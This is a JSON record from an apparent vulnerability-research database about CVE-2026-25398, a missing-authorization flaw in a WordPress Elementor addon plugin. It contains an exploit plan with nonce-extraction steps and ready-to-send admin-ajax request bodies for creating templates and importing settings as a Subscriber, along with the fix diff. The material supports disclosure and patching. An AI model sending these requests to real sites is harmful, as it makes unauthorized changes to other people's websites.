[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fLDAKUEVGV--hVMBI66pq4iyBHFP5hDaGEC7GzY11KGM":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-25398","vertex-addons-for-elementor-missing-authorization","Vertex Addons for Elementor \u003C= 1.6.4 - Missing Authorization","The Vertex Addons for Elementor plugin for WordPress is vulnerable to unauthorized access due to a missing capability check on a function in all versions up to, and including, 1.6.4. 
This makes it possible for authenticated attackers, with Subscriber-level access and above, to perform an unauthorized action.","addons-for-elementor-builder",null,"\u003C=1.6.4","1.7.0","medium",4.3,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:U\u002FC:N\u002FI:L\u002FA:N","Missing Authorization","2026-03-23 00:00:00","2026-04-02 15:08:58",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002Fd04e87f3-351c-4352-a6f1-69c652baa992?source=api-prod",11,[22,23,24,25,26,27,28,29],"addons-for-elementor-builder.php","afeb.php","app\u002FAjax.php","app\u002FAssets.php","assets\u002Fjs\u002Fglobal\u002Fcomponent.js","assets\u002Fjs\u002Fglobal\u002Fcomponent.min.js","html\u002Fadmin\u002Fmenus\u002Fdashboard\u002Ffragments\u002Fcontent\u002Fdashboard\u002Ftpl.php","readme.txt","researched",false,3,"# Research Plan: Missing Authorization in Vertex Addons for Elementor (CVE-2026-25398)\n\n## 1. Vulnerability Summary\nThe **Vertex Addons for Elementor** plugin (up to 1.6.4) is vulnerable to missing authorization. Specifically, the functions `create_template` and `create_popup` in the `AFEB\\Ajax` class fail to perform capability checks (e.g., `current_user_can('edit_posts')`). \n\nWhile these functions verify a WordPress nonce (`afeb_ajax_nonce`), this nonce is enqueued in the WordPress admin dashboard for all logged-in users, including those with **Subscriber** roles. Consequently, a Subscriber can create arbitrary Elementor templates and popups, leading to unauthorized data modification (Integrity: Low).\n\n## 2. 
Attack Vector Analysis\n- **Endpoint**: `\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Action**: `afeb_create_template` or `afeb_create_popup`\n- **Authentication**: Authenticated (Subscriber-level or higher).\n- **Vulnerable Parameters**: \n    - `data[type]` (Template type: header, footer, single, archive, or dynamic-loop-item)\n    - `data[name]` (Post title)\n- **Preconditions**: The attacker must be logged in to WordPress to obtain the valid admin nonce.\n\n## 3. Code Flow\n1. **Hook Registration**: `app\u002Fafeb.php` initializes the `AFEB\\Ajax` class via `(new Ajax())->init()`.\n2. **Action Mapping**: `app\u002FAjax.php` in `actions()` registers the AJAX handlers:\n   ```php\n   add_action('wp_ajax_afeb_create_template', [$this, 'create_template']);\n   add_action('wp_ajax_afeb_create_popup', [$this, 'create_popup']);\n   ```\n3. **Trigger**: An authenticated user sends a POST request with `action=afeb_create_template`.\n4. **Vulnerable Function**: `Ajax::create_template()` is called:\n   - It verifies the nonce: `check_ajax_referer('afeb_ajax_nonce', 'nonce');`\n   - It fails to check user capabilities.\n   - It calls `wp_insert_post()` to create a post of type `AFEB\\PostTypes\\Builder::BUILDER_POST_TYPE`.\n   - It updates post meta using `update_post_meta($id, '_afeb_document_type', $type);`.\n\n## 4. Nonce Acquisition Strategy\nThe nonce is localized for the WordPress admin backend. Any logged-in user can access `\u002Fwp-admin\u002Fprofile.php`, where the plugin's backend scripts are enqueued.\n\n1. **Navigate**: Use the browser to go to `\u002Fwp-admin\u002Fprofile.php`.\n2. **Find Script**: The `app\u002FAssets.php` file registers `afeb-backend-script`. The nonce is likely part of a localized object.\n3. **Extract**: Use `browser_eval` to find the nonce. 
The object name is likely `afeb_backend_params` or `afeb_params` (based on naming conventions in `Assets.php`).\n   - `browser_eval(\"window.afeb_backend_params?.nonce\")`\n   - Alternatively, search the HTML source for the string `\"afeb_ajax_nonce\"`.\n\n## 5. Exploitation Strategy\n### Create an Elementor Template\n- **Method**: POST\n- **URL**: `http:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```\n  action=afeb_create_template&nonce=[EXTRACTED_NONCE]&data[type]=header&data[name]=VulnerablePost\n  ```\n\n### Create an Elementor Popup\n- **Method**: POST\n- **URL**: `http:\u002F\u002FTARGET\u002Fwp-admin\u002Fadmin-ajax.php`\n- **Headers**: `Content-Type: application\u002Fx-www-form-urlencoded`\n- **Body**:\n  ```\n  action=afeb_create_popup&nonce=[EXTRACTED_NONCE]&data[name]=VulnerablePopup\n  ```\n\n## 6. Test Data Setup\n1. **Target Version**: Ensure plugin version 1.6.4 is installed and active.\n2. **User Creation**: Create a user with the `subscriber` role.\n   - `wp user create attacker attacker@example.com --role=subscriber --user_pass=password`\n3. **Dependencies**: Ensure **Elementor** is installed and active, as the plugin requires it to initialize the AJAX class.\n\n## 7. Expected Results\n- The server should respond with a JSON success message: `{\"success\":true,\"data\":{\"redirect\":\"...\",\"message\":\"The new template has been created\"}}`.\n- A new post should be created in the database.\n\n## 8. Verification Steps\n1. **Check Posts**: Use WP-CLI to check for the newly created post type.\n   - For templates: `wp post list --post_type=afeb_builder --field=post_title` (Note: `afeb_builder` is the inferred slug for `Builder::BUILDER_POST_TYPE`).\n   - For popups: `wp post list --post_type=afeb_popup --field=post_title` (Note: `afeb_popup` is the inferred slug for `Popup::POPUP_POST_TYPE`).\n2. 
**Verify Meta**: Confirm the template type was set correctly.\n   - `wp post meta list [NEW_POST_ID]`\n\n## 9. Alternative Approaches\nIf `afeb_create_template` fails due to strict post-type checks, attempt `afeb_activate_required_plugins` or `afeb_import_settings` which are also registered in `Ajax::actions()` and appear to lack capability checks.\n\n- **Import Settings Exploit**:\n  ```\n  action=afeb_import_settings&nonce=[NONCE]&data=[BASE64_SETTINGS]\n  ```\n- **Required Plugins Exploit**:\n  ```\n  action=afeb_activate_required_plugins&nonce=[NONCE]&data[slug]=any-plugin-slug\n  ```","The Vertex Addons for Elementor plugin for WordPress (up to version 1.6.4) fails to implement proper authorization checks on several AJAX functions, including those for template creation, plugin activation, and settings imports. While these functions verify a nonce, a nonce only provides CSRF protection and is not an authorization check; because the nonce is available to any authenticated user, low-privileged attackers like Subscribers can perform unauthorized administrative actions. Note that in the 1.6.4 to 1.7.0 fix diff of app\u002FAjax.php recorded with this entry, the plugin-installation handler already called current_user_can('install_plugins') in 1.6.4 but only stored an error string at that point, and 1.7.0 replaces this with wp_send_json_error(..., 403) and adds current_user_can('manage_options') checks to two import handlers; no hunk touching create_template or create_popup is shown, so verify those handlers against the full 1.7.0 source before treating them as patched.","\u002F\u002F app\u002FAjax.php line 54\nadd_action('wp_ajax_afeb_create_template', [$this, 'create_template']);\nadd_action('wp_ajax_afeb_create_popup', [$this, 'create_popup']);\nadd_action('wp_ajax_afeb_activate_required_plugins', [$this, 'activate_required_plugins']);\nadd_action('wp_ajax_afeb_import_templates_kit', [$this, 'import_templates_kit']);\nadd_action('wp_ajax_afeb_import_settings', [$this, 'import_settings']);\n\n---\n\n\u002F\u002F app\u002FAjax.php line 122\npublic function create_template()\n{\n    check_ajax_referer('afeb_ajax_nonce', 'nonce');\n\n    $type = isset($_POST['data']['type']) ? sanitize_text_field(wp_unslash($_POST['data']['type'])) : '';\n    \u002F\u002F ... (missing capability check before wp_insert_post)\n\n---\n\n\u002F\u002F app\u002FAjax.php line 211\npublic function create_popup()\n{\n    check_ajax_referer('afeb_ajax_nonce', 'nonce');\n\n    $name = isset($_POST['data']['name']) ? 
sanitize_text_field(wp_unslash($_POST['data']['name'])) : '';\n    \u002F\u002F ... (missing capability check before wp_insert_post)","diff -ru \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Faddons-for-elementor-builder\u002F1.6.4\u002Fapp\u002FAjax.php \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Faddons-for-elementor-builder\u002F1.7.0\u002Fapp\u002FAjax.php\n--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Faddons-for-elementor-builder\u002F1.6.4\u002Fapp\u002FAjax.php\t2026-02-28 04:34:56.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Faddons-for-elementor-builder\u002F1.7.0\u002Fapp\u002FAjax.php\t2026-03-25 18:05:28.000000000 +0000\n@@ -224,10 +224,14 @@\n     {\n         check_ajax_referer('afeb_ajax_nonce', 'nonce');\n \n-        $error = '';\n-\n         if (!current_user_can('install_plugins'))\n-            $error = esc_html__('Sorry, you are not allowed to install plugins on this site.', 'addons-for-elementor-builder');\n+        {\n+            wp_send_json_error([\n+                'message' => esc_html__('Sorry, you are not allowed to install plugins on this site.', 'addons-for-elementor-builder'),\n+            ], 403);\n+        }\n+\n+        $error = '';\n \n         $plugins = isset($_POST['plugins']) ? 
map_deep($_POST['plugins'], 'sanitize_text_field') : [];\n         $time_limit = ini_get('max_execution_time');\n@@ -294,6 +298,13 @@\n     {\n         check_ajax_referer('afeb_ajax_nonce', 'nonce');\n \n+        if (!current_user_can('manage_options'))\n+        {\n+            wp_send_json_error([\n+                'message' => esc_html__('Sorry, you are not allowed to import template kit settings on this site.', 'addons-for-elementor-builder'),\n+            ], 403);\n+        }\n+\n         $time_limit = ini_get('max_execution_time');\n \n         if (!did_action('elementor\u002Floaded') || !class_exists(Plugin::class))\n@@ -386,6 +397,13 @@\n     {\n         check_ajax_referer('afeb_ajax_nonce', 'nonce');\n \n+        if (!current_user_can('manage_options'))\n+        {\n+            wp_send_json_error([\n+                'message' => esc_html__('Sorry, you are not allowed to import template kits on this site.', 'addons-for-elementor-builder'),\n+            ], 403);\n+        }\n+\n         $args = [","1. Login to the WordPress site as a Subscriber-level user.\n2. Access the WordPress admin dashboard (e.g., \u002Fwp-admin\u002Fprofile.php) to obtain the plugin's localized AJAX nonce, 'afeb_ajax_nonce'.\n3. Construct an AJAX request targeting 'admin-ajax.php'.\n4. Set the 'action' parameter to a vulnerable handler such as 'afeb_create_template' or 'afeb_import_settings'.\n5. Include the extracted nonce in the 'nonce' parameter.\n6. 
Provide payload parameters (e.g., 'data[type]=header&data[name]=MaliciousTemplate') to create new site components or modify settings without having the required administrative permissions.","gemini-3-flash-preview","2026-04-18 00:15:25","2026-04-18 00:15:48",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.6.4","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-elementor-builder\u002Ftags\u002F1.6.4","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Faddons-for-elementor-builder.1.6.4.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-elementor-builder\u002Ftags\u002F1.7.0","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Faddons-for-elementor-builder.1.7.0.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Faddons-for-elementor-builder\u002Ftags"]